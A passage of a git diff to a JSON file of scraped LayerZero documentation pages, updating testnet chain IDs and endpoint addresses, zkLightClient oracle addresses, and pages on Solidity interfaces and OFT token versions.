[ ChainId . GOERLI ] : 3 , [ ChainId . ARBITRUM_GOERLI ] : 3 , [ ChainId . OPTIMISM_GOERLI ] : 3 , [ ChainId . INTAIN_TESTNET ] : 1 , [ ChainId . CELO_TESTNET ] : 1 , [ ChainId . FUSE_TESTNET ] : 1 , [ ChainId . APTOS_TESTNET ] : 10 , [ ChainId . DOS_TESTNET ] : 1 , [ ChainId . ZKSYNC_TESTNET ] : 10 , [ ChainId . SHRAPNEL_TESTNET ] : 1 , [ ChainId . KLAYTN_TESTNET ] : 1 , [ ChainId . METIS_TESTNET ] : 1 , [ ChainId . COREDAO_TESTNET ] : 1 , [ ChainId . GNOSIS_TESTNET ] : 1 , } Transactions originating from the above chains should be delivered after a minimum of the specified source Block Confirmations Previous Testnet Addresses Next - Technical Reference Mainnet Last modified 1d ago", "labels": [ "Documentation" ] @@ -1706,7 +1706,7 @@ { "title": "Testnet Addresses", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/testnet/testnet-addresses", - "body": "Testnet Addresses Supported Chains (Testnet)To send and receive messages, LayerZero endpoints use a chainId to identify different blockchains. Below is a table of the supported test networks along with their unique chainId.Review carefully. LayerZero assigns proprietary IDs to each chain. Official Endpoint Addresses (TESTNET) Note: chainId values are not related to EVM IDs. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. These are the addresses of the contracts on which you would call send() By the way, if you want to go straight to mainnet , look no further. Goerli (Ethereum Testnet) chainId : 10121 endpoint : 0xbfD2135BFfbb0B5378b56643c2Df8a87552Bfa23 BNB Chain (Testnet) chainId : 10102 endpoint : 0x6Fcb97553D41516Cb228ac03FdC8B9a0a9df04A1 Fuji (Avalanche Testnet) chainId : 10106 endpoint : 0x93f54D755A063cE7bB9e6Ac47Eccc8e33411d706 Aptos (Testnet) chainId : 10108 endpoint : 0x1759cc0d3161f1eb79f65847d4feb9d1f74fb79014698a23b16b28b9cd4c37e3 Mumbai (Polygon Testnet) chainId : 10109 endpoint : 0xf69186dfBa60DdB133E91E9A4B5673624293d8F8 Fantom (Testnet) chainId : 10112 endpoint : 0x7dcAD72640F835B0FA36EFD3D6d3ec902C7E5acf Arbitrum-Goerli (Testnet) chainId : 10143 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Optimism-Goerli (Testnet) chainId : 10132 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Harmony (Testnet) chainId : 10133 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Moonbeam (Testnet) chainId : 10126 endpoint : 0xb23b28012ee92E8dE39DEb57Af31722223034747 Celo (Testnet) chainId : 10125 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Dexalot (Testnet) chainId : 10118 endpoint : 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Portal Fantasy (Testnet) chainId : 10128 endpoint : 0xd682ECF100f6F4284138AA925348633B0611Ae21 Klaytn (Testnet) chainId : 10150 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Metis (Testnet) chainId : 10151 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 CoreDao (Testnet) chainId : 10153 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Gnosis (Testnet) chainId : 10145 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 zkSync (Testnet) chainId : 10165 endpoint : 0x093D2CF57f764f09C3c2Ac58a42A2601B8C79281 OKX (Testnet) chainId : 10155 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Base (Testnet) chainId : 10160 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Meter (Testnet) chainId : 10156 endpoint : 0x3De2f3D1Ac59F18159ebCB422322Cb209BA96aAD Linea (ConsenSys zkEVM - Testnet) chainId : 10157 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab DOS (Testnet) chainId : 10162 endpoint : 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Sepolia (Testnet) chainId : 10161 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Polygon zkEVM (Testnet) chainId : 10158 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Scroll (Testnet) chainId : 10170 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Tenet (Testnet) chainId : 10173 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Canto (Testnet) chainId : 10159 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Kava (Testnet) chainId : 10172 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Orderly (Testnet - opstack) chainId : 10200 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 BlockGen (Testnet) chainId : 10177 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 MeritCircle (Testnet) chainId : 10178 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Mantle (Testnet) chainId : 10181 endpoint : 0x2cA20802fd1Fd9649bA8Aa7E50F0C82b479f35fe Hubble (Testnet) chainId : 10182 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Aavegotchi (Testnet) chainId : 10191 endpoint : 0xfeBE4c839EFA9f506C092a32fD0BB546B76A1d38 Loot (Testnet) chainId : 10197 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Telos (Testnet) chainId : 10199 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Zora (Testnet) chainId : 10195 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Tomo (Testnet) chainId : 10196 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 opBNB (Testnet) chainId : 10202 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Shimmer (Testnet) chainId : 10203 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Aurora (Testnet) chainId : 10201 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Lif3 (Testnet) chainId : 10205 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 Technical Reference - Previous Testnet Next Default Config Last modified 26d ago", + "body": "Testnet Addresses Supported Chains (Testnet)To send and receive messages, LayerZero endpoints use a chainId to identify different blockchains. Below is a table of the supported test networks along with their unique chainId.Review carefully. LayerZero assigns proprietary IDs to each chain. Official Endpoint Addresses (TESTNET) Note: chainId values are not related to EVM IDs. Since LayerZero will span EVM & non-EVM chains the chainId are proprietary to our Endpoints. These are the addresses of the contracts on which you would call send() By the way, if you want to go straight to mainnet , look no further. Goerli (Ethereum Testnet) chainId : 10121 endpoint : 0xbfD2135BFfbb0B5378b56643c2Df8a87552Bfa23 BNB Chain (Testnet) chainId : 10102 endpoint : 0x6Fcb97553D41516Cb228ac03FdC8B9a0a9df04A1 Fuji (Avalanche Testnet) chainId : 10106 endpoint : 0x93f54D755A063cE7bB9e6Ac47Eccc8e33411d706 Aptos (Testnet) chainId : 10108 endpoint : 0x1759cc0d3161f1eb79f65847d4feb9d1f74fb79014698a23b16b28b9cd4c37e3 Mumbai (Polygon Testnet) chainId : 10109 endpoint : 0xf69186dfBa60DdB133E91E9A4B5673624293d8F8 Fantom (Testnet) chainId : 10112 endpoint : 0x7dcAD72640F835B0FA36EFD3D6d3ec902C7E5acf Arbitrum-Goerli (Testnet) chainId : 10143 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Optimism-Goerli (Testnet) chainId : 10132 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Harmony (Testnet) chainId : 10133 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Moonbeam (Testnet) chainId : 10126 endpoint : 0xb23b28012ee92E8dE39DEb57Af31722223034747 Celo (Testnet) chainId : 10125 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Dexalot (Testnet) chainId : 10118 endpoint : 0x6C7Ab2202C98C4227C5c46f1417D81144DA716Ff Portal Fantasy (Testnet) chainId : 10128 endpoint : 0xd682ECF100f6F4284138AA925348633B0611Ae21 Klaytn (Testnet) chainId : 10150 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Metis (Testnet) chainId : 10151 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 CoreDao (Testnet) chainId : 10153 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Gnosis (Testnet) chainId : 10145 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 zkSync (Testnet) chainId : 10165 endpoint : 0x093D2CF57f764f09C3c2Ac58a42A2601B8C79281 OKX (Testnet) chainId : 10155 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Base (Testnet) chainId : 10160 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Meter (Testnet) chainId : 10156 endpoint : 0x3De2f3D1Ac59F18159ebCB422322Cb209BA96aAD Linea (ConsenSys zkEVM - Testnet) chainId : 10157 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab DOS (Testnet) chainId : 10162 endpoint : 0x45841dd1ca50265Da7614fC43A361e526c0e6160 Sepolia (Testnet) chainId : 10161 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Polygon zkEVM (Testnet) chainId : 10158 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Scroll Sepolia (Testnet) chainId : 10214 endpoint : 0x6098e96a28E02f27B1e6BD381f870F1C8Bd169d3 Tenet (Testnet) chainId : 10173 endpoint : 0x6aB5Ae6822647046626e83ee6dB8187151E1d5ab Canto (Testnet) chainId : 10159 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Kava (Testnet) chainId : 10172 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Orderly (Testnet - opstack) chainId : 10200 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 BlockGen (Testnet) chainId : 10177 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 MeritCircle (Testnet) chainId : 10178 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 Mantle (Testnet) chainId : 10181 endpoint : 0x2cA20802fd1Fd9649bA8Aa7E50F0C82b479f35fe Hubble (Testnet) chainId : 10182 endpoint : 0x8b14D287B4150Ff22Ac73DF8BE720e933f659abc Aavegotchi (Testnet) chainId : 10191 endpoint : 0xfeBE4c839EFA9f506C092a32fD0BB546B76A1d38 Loot (Testnet) chainId : 10197 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Telos (Testnet) chainId : 10199 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Zora (Testnet) chainId : 10195 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Tomo (Testnet) chainId : 10196 endpoint : 0xae92d5aD7583AD66E49A0c67BAd18F6ba52dDDc1 opBNB (Testnet) chainId : 10202 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Shimmer (Testnet) chainId : 10203 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Aurora (Testnet) chainId : 10201 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Lif3 (Testnet) chainId : 10205 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 Conflux (Testnet) chainId : 10211 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Horizen EON (Testnet) chainId : 10215 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 XPLA (Testnet) chainId : 10216 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 Astar (evm testnet) chainId : 10210 endpoint : 0x83c73Da98cf733B03315aFa8758834b36a195b87 zKatana (Astar zkevm testnet) chainId : 10220 endpoint : 0x6098e96a28E02f27B1e6BD381f870F1C8Bd169d3 Manta (Testnet) chainId : 10221 endpoint : 0x55370E0fBB5f5b8dAeD978BA1c075a499eB107B8 Technical Reference - Previous Testnet Next Default Config Last modified 5d ago", "labels": [ "Documentation" ] @@ -1714,7 +1714,7 @@ { "title": "zkLightClient Addresses", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/overview-of-polyhedra-zklightclient/zklightclient-addresses", - "body": "zkLightClient Addresses Contract Addresses to use zkLightClient with LayerZero To use the Polyhedra zkLightClient with your LayerZero UserApplication, configure your app with the oracle addresses below. zkLightClient Addresses (Mainnets) Ethereum 0x394ee343625B83B5778d6F42d35142bdf26dBAcD BNB Smart Chain 0x76ce31EfB81a013b609CeeF1Cc4F4E5aEeA70B7f Polygon 0x9D88a2f4253b106A1F8e169485490f7230b4276e CoreDAO: 0x6590C7e65EEC453a78199B0bE418dF7291DF9039 Avalanche 0xD59DdbF4c0E1ed3debD2f7afFc1fA9dEF198A652 Fantom 0x7cE1fab01F3cd7253731a9e11180d49ac960285C Optimism 0x40b237EDdb5B851C60630446ca120A1D5c7B6253 Arbitrum One 0x2274D83ed2B4c1fCd6C1CCBF9b734F7e436DfD44 Moonbeam0xE04E090a49aE0AF87583B808B05d2dc8c4d1E712 Gnosis Chain 0xFd1fabb34c4D6B5D30a1bFE2Fa76Cc15206fb368 Metis 0x057DCB38db5350Db12DCD94428c303D523f72153 Arbitrum Nova 0xD2C51b14cA69D7E557719A8534e1c5514f28DB3b zkLightClient Addresses (Testnets) Ethereum Goerli Testnet: 0x55d193eF196Be455c9c178b0984d7F9cE750CCb4 BNB Smart Chain Testnet: 0x2C41853Ed4681A39c89c61Cdeb8c155561391215 Avalanche Fuji Testnet: 0x8517BA5E3eda338d9707a7B4a36033331e3d3B00 Optimism Goerli Testnet: 0x1853f53Aa7d9f6aF8537833c4255f928ab8F9D61 Arbitrum Goerli Testnet: 0xbFB5FEE3DCf2aF08F9f7a05049806fBC2E72A702 Previous zkLightClient on LayerZero Next - Technical Reference Testnet Last modified 16d ago", + "body": "zkLightClient Addresses Contract Addresses to use zkLightClient with LayerZero To use the Polyhedra zkLightClient with your LayerZero UserApplication, configure your app with the oracle addresses below. zkLightClient Addresses (Mainnets) Ethereum 0x394ee343625B83B5778d6F42d35142bdf26dBAcD BNB Smart Chain 0x76ce31EfB81a013b609CeeF1Cc4F4E5aEeA70B7f Polygon 0x9D88a2f4253b106A1F8e169485490f7230b4276e CoreDAO: 0x6590C7e65EEC453a78199B0bE418dF7291DF9039 Avalanche 0xD59DdbF4c0E1ed3debD2f7afFc1fA9dEF198A652 Fantom 0x7cE1fab01F3cd7253731a9e11180d49ac960285C Optimism 0x40b237EDdb5B851C60630446ca120A1D5c7B6253 Arbitrum One 0x2274D83ed2B4c1fCd6C1CCBF9b734F7e436DfD44 Moonbeam0xE04E090a49aE0AF87583B808B05d2dc8c4d1E712 Gnosis Chain 0xFd1fabb34c4D6B5D30a1bFE2Fa76Cc15206fb368 Metis 0x057DCB38db5350Db12DCD94428c303D523f72153 Arbitrum Nova 0xD2C51b14cA69D7E557719A8534e1c5514f28DB3b zkLightClient Addresses (Testnets) Ethereum Goerli Testnet: 0x55d193eF196Be455c9c178b0984d7F9cE750CCb4 BNB Smart Chain Testnet: 0x2C41853Ed4681A39c89c61Cdeb8c155561391215 Avalanche Fuji Testnet: 0x8517BA5E3eda338d9707a7B4a36033331e3d3B00 Optimism Goerli Testnet: 0x1853f53Aa7d9f6aF8537833c4255f928ab8F9D61 Arbitrum Goerli Testnet: 0xbFB5FEE3DCf2aF08F9f7a05049806fBC2E72A702 Previous zkLightClient on LayerZero Next - Technical Reference Testnet Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1722,127 +1722,127 @@ { "title": "zkLightClient on LayerZero", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/overview-of-polyhedra-zklightclient/zklightclient-on-layerzero", - "body": "zkLightClient on LayerZero Integrating Polyhedra zkLightClient technology into LayerZero LayerZero is an omnichain interoperability protocol that enables cross-chain messaging. Applications built using blockchain technology (decentralized applications) can use the LayerZero protocol to connect to 30+ supported blockchains seamlessly. This allows dApp users to interact securely and efficiently with assets across chains. Polyhedra's zkLightClient technology is fully integrated with LayerZero's messaging protocol, so application developers can use zero-knowledge-proof technology without barriers. Developers can easily build cross-chain applications on top of LayerZero through its extensive developer tooling and community support. Incorporating Polyhedra zkLightClient technology into Layerzero Network LayerZero's ULNv2 validation library relies on two parties, the Oracle and Relayer, to transfer messages between on-chain endpoints. When LayerZero sends a message from chain A to chain B, the message is routed through the endpoint on chain A to the ULNv2 validation library. The ULNv2 library notifies the Oracle and Relayer of the message and its destination chain. The Oracle forwards the packet hash to the endpoint on chain B, and the Relayer submits the packet to be verified on-chain against the hash and delivers the message. On-chain light clients allow for the source chain's validator set to attest to something that occurred on their chain to a destination chain. In conjunction with other libraries, light clients add a layer of security on top of the LayerZero messaging protocol. On-chain transaction verification has been cost-prohibitive to the tune of $50m-$100m/day per pair-wise chain connected to Ethereum due to the presence of extensive transaction logs, which are necessary for the proof but not for the application itself. Polyhedra's zkLightClient technology, built on LayerZero, harnesses the compression of ZKP technology and reduces the on-chain verification tremendously with lower latency by using efficient ZKP protocols. In addition, multiple transaction verifications can be batched into a single zero-knowledge proof. Previous Overview of Polyhedra zkLightClient Next zkLightClient Addresses Last modified 15d ago", + "body": "zkLightClient on LayerZero Integrating Polyhedra zkLightClient technology into LayerZero LayerZero is an omnichain interoperability protocol that enables cross-chain messaging. Applications built using blockchain technology (decentralized applications) can use the LayerZero protocol to connect to 30+ supported blockchains seamlessly. This allows dApp users to interact securely and efficiently with assets across chains. Polyhedra's zkLightClient technology is fully integrated with LayerZero's messaging protocol, so application developers can use zero-knowledge-proof technology without barriers. Developers can easily build cross-chain applications on top of LayerZero through its extensive developer tooling and community support. Incorporating Polyhedra zkLightClient technology into Layerzero Network LayerZero's ULNv2 validation library relies on two parties, the Oracle and Relayer, to transfer messages between on-chain endpoints. When LayerZero sends a message from chain A to chain B, the message is routed through the endpoint on chain A to the ULNv2 validation library. The ULNv2 library notifies the Oracle and Relayer of the message and its destination chain. The Oracle forwards the packet hash to the endpoint on chain B, and the Relayer submits the packet to be verified on-chain against the hash and delivers the message. On-chain light clients allow for the source chain's validator set to attest to something that occurred on their chain to a destination chain. In conjunction with other libraries, light clients add a layer of security on top of the LayerZero messaging protocol. On-chain transaction verification has been cost-prohibitive to the tune of $50m-$100m/day per pair-wise chain connected to Ethereum due to the presence of extensive transaction logs, which are necessary for the proof but not for the application itself. Polyhedra's zkLightClient technology, built on LayerZero, harnesses the compression of ZKP technology and reduces the on-chain verification tremendously with lower latency by using efficient ZKP protocols. In addition, multiple transaction verifications can be batched into a single zero-knowledge proof. Previous Overview of Polyhedra zkLightClient Next zkLightClient Addresses Last modified 1mo ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroEndpoint", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzeroendpoint", - "body": "ILayerZeroEndpoint // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroEndpoint is ILayerZeroUserApplicationConfig { // @notice send a LayerZero message to the specified address at a LayerZero endpoint. // @param _dstChainId - the destination chain identifier // @param _destination - the address on destination chain (in bytes). address length/format may vary by chains // @param _payload - a custom bytes payload to send to the destination contract // @param _refundAddress - if the source transaction is cheaper than the amount of value passed, refund the additional amount to this address // @param _zroPaymentAddress - the address of the ZRO token holder who would pay for the transaction // @param _adapterParams - parameters for custom functionality. e.g. receive airdropped native gas from the relayer on destination function send ( uint16 _dstChainId , bytes calldata _destination , bytes calldata _payload , address payable _refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // @notice used by the messaging library to publish verified payload // @param _srcChainId - the source chain identifier // @param _srcAddress - the source contract (as bytes) at the source chain // @param _dstAddress - the address on destination chain // @param _nonce - the unbound message ordering nonce // @param _gasLimit - the gas limit for external contract execution // @param _payload - verified payload to send to the destination contract function receivePayload ( uint16 _srcChainId , bytes calldata _srcAddress , address _dstAddress , uint64 _nonce , uint _gasLimit , bytes calldata _payload ) external ; // @notice get the inboundNonce of a receiver from a source chain which could be EVM or non-EVM chain // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function getInboundNonce ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( uint64 ); // @notice get the outboundNonce from this source chain which, consequently, is always an EVM // @param _srcAddress - the source chain contract address function getOutboundNonce ( uint16 _dstChainId , address _srcAddress ) external view returns ( uint64 ); // @notice gets a quote in source native gas, for the amount that send() requires to pay for message delivery // @param _dstChainId - the destination chain identifier // @param _userApplication - the user app address on this EVM chain // @param _payload - the custom message to send over LayerZero // @param _payInZRO - if false, user app pays the protocol fee in native token // @param _adapterParam - parameters for the adapter service, e.g. send some dust native token to dstChain function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); // @notice get this Endpoint's immutable source identifier function getChainId () external view returns ( uint16 ); // @notice the interface to retry failed message on this Endpoint destination // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address // @param _payload - the payload to be retried function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external ; // @notice query if any STORED payload (message blocking) at the endpoint. // @param _srcChainId - the source chain identifier // @param _srcAddress - the source chain contract address function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view returns ( bool ); // @notice query if the _libraryAddress is valid for sending msgs. // @param _userApplication - the user app address on this EVM chain function getSendLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the _libraryAddress is valid for receiving msgs. // @param _userApplication - the user app address on this EVM chain function getReceiveLibraryAddress ( address _userApplication ) external view returns ( address ); // @notice query if the non-reentrancy guard for send() is on // @return true if the guard is on. false otherwise function isSendingPayload () external view returns ( bool ); // @notice query if the non-reentrancy guard for receive() is on // @return true if the guard is on. false otherwise function isReceivingPayload () external view returns ( bool ); // @notice get the configuration of the LayerZero messaging library of the specified version // @param _version - messaging library version // @param _chainId - the chainId for the pending config change // @param _userApplication - the contract address of the user application // @param _configType - type of configuration. every messaging library has its own convention. function getConfig ( uint16 _version , uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ); } Previous ILayerZeroReceiver Next ILayerZeroMessagingLibrary Last modified 3mo ago", + "title": "IERC165 OFT Interface Ids", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/ierc165-oft-interface-ids", + "body": "IERC165 OFT Interface Ids Use these interface ids to determine which version of OFT is deployed. OFT(v1): 0x14e4ceea OFTV2: 0x1f7ecdf7 OFTWithFee: 0x6984a9e8 interface ERC165 { /// @notice Query if a contract implements an interface /// @param interfaceID The interface identifier, as specified in ERC-165 /// @dev Interface identification is specified in ERC-165. This function /// uses less than 30,000 gas. /// @return `true` if the contract implements `interfaceID` and /// `interfaceID` is not 0xffffffff, `false` otherwise function supportsInterface(bytes4 interfaceID) external view returns (bool); } Example Hardhat Task module . exports = async function ( taskArgs ) { const OFTInterfaceId = 0x14e4ceea ; const OFTV2InterfaceId = 0x1f7ecdf7 ; const OFTWithFeeInterfaceId = 0x6984a9e8 ; const ERC165ABI = [ \"function supportsInterface(bytes4) public view returns (bool)\" ]; try { const contract = await ethers . getContractAt ( ERC165ABI , taskArgs . address ); const isOFT = await contract . supportsInterface ( OFTInterfaceId ); const isOFTV2 = await contract . supportsInterface ( OFTV2InterfaceId ); const isOFTWithFee = await contract . supportsInterface ( OFTWithFeeInterfaceId ); if ( isOFT ) { console . log ( ` address: ${ taskArgs . address } is OFT(v1) ` ) } else if ( isOFTV2 ) { console . log ( ` address: ${ taskArgs . address } is OFTV2 ` ) } else if ( isOFTWithFee ) { console . log ( ` address: ${ taskArgs . address } is OFTWithFee ` ) } else { console . log ( ` address: ${ taskArgs . address } is not an OFT ` ) } } catch ( e ) { console . log ( \"supportsInterface not implemented\" ) } } Previous OFT Next OFT (V1) vs OFTV2 - Which should I use? Last modified 3mo ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroMessagingLibrary", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzeromessaginglibrary", - "body": "ILayerZeroMessagingLibrary // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; import \"./ILayerZeroUserApplicationConfig.sol\" ; interface ILayerZeroMessagingLibrary { // send(), messages will be inflight. function send ( address _userApplication , uint64 _lastNonce , uint16 _chainId , bytes calldata _destination , bytes calldata _payload , address payable refundAddress , address _zroPaymentAddress , bytes calldata _adapterParams ) external payable ; // estimate native fee at the send side function estimateFees ( uint16 _chainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParam ) external view returns ( uint nativeFee , uint zroFee ); //--------------------------------------------------------------------------- // setConfig / getConfig are User Application (UA) functions to specify Oracle, Relayer, blockConfirmations, libraryVersion function setConfig ( uint16 _chainId , address _userApplication , uint _configType , bytes calldata _config ) external ; function getConfig ( uint16 _chainId , address _userApplication , uint _configType ) external view returns ( bytes memory ); } Previous ILayerZeroEndpoint Next ILayerZeroUserApplicationConfig Last modified 3mo ago", + "title": "OFT (V1)", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1", + "body": "OFT (V1) Omnichain Fungible Token standard written to support EVM chains only. OFT.sol https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/oft/v1/OFT.sol Extensions ProxyOFT.sol Use this extension when you want to turn an already deployed ERC20 into an OFT. You can then deploy OFT contracts on the LayerZero supported chains of your choosing. When you want to transfer your OFT from the source chain the OFT will lock in the ProxyOFT and mint on the destination chain. When you come back to the ProxyOFT chain the OFT burns on the source chain and unlocks on the destination chain. https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/token/oft/v1/ProxyOFT.sol Previous OFT (V1) vs OFTV2 - Which should I use? Next OFTV2 Last modified 21d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroOracle.sol", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzerooracle.sol", - "body": "ILayerZeroOracle.sol // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.7.0 ; interface ILayerZeroOracle { // @notice query the oracle price for relaying block information to the destination chain // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed function getPrice ( uint16 _dstChainId , uint16 _outboundProofType ) external view returns ( uint price ); // @notice Ultra-Light Node notifies the Oracle of a new block information relaying request // @param _dstChainId the destination endpoint identifier // @param _outboundProofType the proof type identifier to specify the data to be relayed // @param _outboundBlockConfirmations the number of source chain block confirmation needed function notifyOracle ( uint16 _dstChainId , uint16 _outboundProofType , uint64 _outboundBlockConfirmations ) external ; // @notice query if the address is an approved actor for privileges like data submission and fee withdrawal etc. // @param _address the address to be checked function isApproved ( address _address ) external view returns ( bool approved ); } Previous ILayerZeroUserApplicationConfig Next ILayerZeroRelayer.sol Last modified 3mo ago", + "title": "OFT (V1) vs OFTV2 - Which should I use?", + "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft/oft-v1-vs-oftv2-which-should-i-use", + "body": "OFT (V1) vs OFTV2 - Which should I use? This page explains the differences between OFT/OFTV2 and when to use each one. When to use OFT (v1) Our Omnichain Fungible Token (OFT) was our first implementation of our standard. This OFT was first used in projects such as Stargate's token. The standard was written to support EVM chains only. If you are looking to only support EVMs now and forever then OFT (V1) is for you. When to use OFTV2 What if you want to build an Omnichain Fungible Token that supports EVMs and non EVMs (eg. Aptos)? In this case you should use our OFTV2 which supports both. This version has fees, shared decimals, and composability built in. This version of OFTV2 is currently being used in projects such as BTCb . What are the differences between the two versions? The main difference between the two versions comes from the limitations of the Non EVMs. Non EVM chains such as Aptos/Solana use Uint64 to represent balance. To account for this, OFTV2 uses Shared Decimals for value transfers to normalize the data type difference. It is recommended to use a smaller shared decimal point on all chains so that your token can have a larger balance. For example, if the decimal point is 18, then you can not have more than approximately 18 * 10^18 tokens bounded by the uint64.max. OFTV2 is intended to be used with no more than 10 shared decimals Previous IERC165 OFT Interface Ids Next OFT (V1) Last modified 6d ago", "labels": [ "Documentation" ] }, { - "title": "ILayerZeroReceiver", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces/ilayerzeroreceiver", - "body": "ILayerZeroReceiver For User Application contracts to receive messages! // SPDX-License-Identifier: BUSL-1.1 pragma solidity >= 0.5.0 ; interface ILayerZeroReceiver { // @notice LayerZero endpoint will invoke this function to deliver the message on the destination // @param _srcChainId - the source endpoint identifier // @param _srcAddress - the source sending contract address from the source chain // @param _nonce - the ordered message nonce // @param _payload - the signed payload is the UA bytes has encoded to be sent function lzReceive ( uint16 _srcChainId , bytes calldata _srcAddress , uint64 _nonce , bytes calldata _payload ) external ; } This is a core interface for contract to implement so they can receive LayerZero messages! See the CounterMock example for usage Previous EVM (Solidity) Interfaces Next ILayerZeroEndpoint Last modified 3mo ago", + "title": "OFTV2", + "html_url": 